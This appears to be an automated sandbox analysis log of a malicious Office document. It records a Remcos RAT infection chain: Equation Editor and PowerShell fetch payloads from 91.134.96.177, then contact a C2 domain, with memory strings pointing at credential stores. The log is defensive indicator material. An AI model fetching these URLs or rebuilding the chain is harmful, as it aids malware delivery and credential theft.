                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 192.168.2.22:49171 -> 91.134.96.177:80
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171
                  Source: global trafficTCP traffic: 91.134.96.177:80 -> 192.168.2.22:49171

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49175 -> 45.90.89.98:6845
                  Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.22:49174 -> 45.90.89.98:6845
                  Source: Network trafficSuricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 1 M1 : 91.134.96.177:80 -> 192.168.2.22:49173
                  Source: Network trafficSuricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 3 M1 : 91.134.96.177:80 -> 192.168.2.22:49173
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro
                  Source: global trafficTCP traffic: 192.168.2.22:49174 -> 45.90.89.98:6845
                  Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /80/WRRDFC.txt HTTP/1.1Host: 91.134.96.177Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 104.21.78.54 104.21.78.54
                  Source: Joe Sandbox ViewIP Address: 45.90.89.98 45.90.89.98
                  Source: Joe Sandbox ViewIP Address: 185.199.109.133 185.199.109.133
                  Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
                  Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                  Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.22:49176 -> 178.237.33.50:80
                  Source: global trafficHTTP traffic detected: GET /S7UYq0 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: og1.inConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 91.134.96.177Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /80/picturewithherimagesverygoodforyourheart.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.134.96.177Connection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49164 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49166 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.22:49172 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: unknownTCP traffic detected without corresponding DNS query: 91.134.96.177
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041B411 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,13_2_0041B411
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2A829E0A-7FC7-4D01-A6EB-6F0871F5882C}.tmpJump to behavior
                  Source: global trafficHTTP traffic detected: GET /S7UYq0 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: og1.inConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /80/uc/seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever.doc HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)UA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 91.134.96.177Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /80/picturewithherimagesverygoodforyourheart.tIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.134.96.177Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /80/WRRDFC.txt HTTP/1.1Host: 91.134.96.177Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: Cookie:user@www.linkedin.com/ equals www.linkedin.com (Linkedin)
                  Source: RegAsm.exe, 00000012.00000002.453958713.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exe, RegAsm.exe, 00000012.00000002.453958713.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
                  Source: RegAsm.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: www.linkedin.come equals www.linkedin.com (Linkedin)
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                  Source: RegAsm.exe, 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
                  Source: RegAsm.exe, 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                  Source: global trafficDNS traffic detected: DNS query: og1.in
                  Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 14:24:18 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closecontent-security-policy: default-src 'none'strict-transport-security: max-age=15552000; includeSubDomainsx-content-type-options: nosniffx-dns-prefetch-control: offx-download-options: noopenx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BEDnYP2a2eWLiLrKs9YJnu3mWIgCiF2subT99aKzhKPzYf0hTkAp%2BDWePLXPVtmBYN5XRFiEPyhP56mSGe2KFWViHcbBotu8ZICa0e8yFyOOA2PbwqP5xUk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8cb4e0316c2141cd-EWR
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Sep 2024 14:24:20 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closecontent-security-policy: default-src 'none'strict-transport-security: max-age=15552000; includeSubDomainsx-content-type-options: nosniffx-dns-prefetch-control: offx-download-options: noopenx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2NRKoUHUfmwUlOfnRKK1g5ZJQMjYMlATd0rHuiKHyLok3qZv84ugmaFM%2BKhKwZ9DBqhGYoKLtobw1uLfGvPHk7T3nqN3LheJooVVDhypdxPHxk%2FckOexKUQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8cb4e039ca8c431f-EWR
                  Source: powershell.exe, 0000000C.00000002.443014450.00000000024F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.96.177
                  Source: powershell.exe, 0000000C.00000002.443014450.00000000024F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://91.134.96.177/80/WRRDFC.txt
                  Source: EQNEDT32.EXE, 00000008.00000002.424729552.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.134.96.177/80/picturewithherimagesverygoodforyourheart.tIF
                  Source: EQNEDT32.EXE, 00000008.00000002.424729552.000000000064F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://91.134.96.177/80/picturewithherimagesverygoodforyourheart.tIFj
                  Source: uc on 91.134.96.177.url.0.drString found in binary or memory: http://91.134.96.177/80/uc/
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                  Source: powershell.exe, 0000000C.00000002.446007440.0000000005016000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                  Source: bhvACB4.tmp.16.dr, bhvC227.tmp.20.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                  Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.953027155.0000000000835000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.953097614.0000000000885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                  Source: powershell.exe, 0000000C.00000002.443572410.0000000003499000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.443572410.0000000003279000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
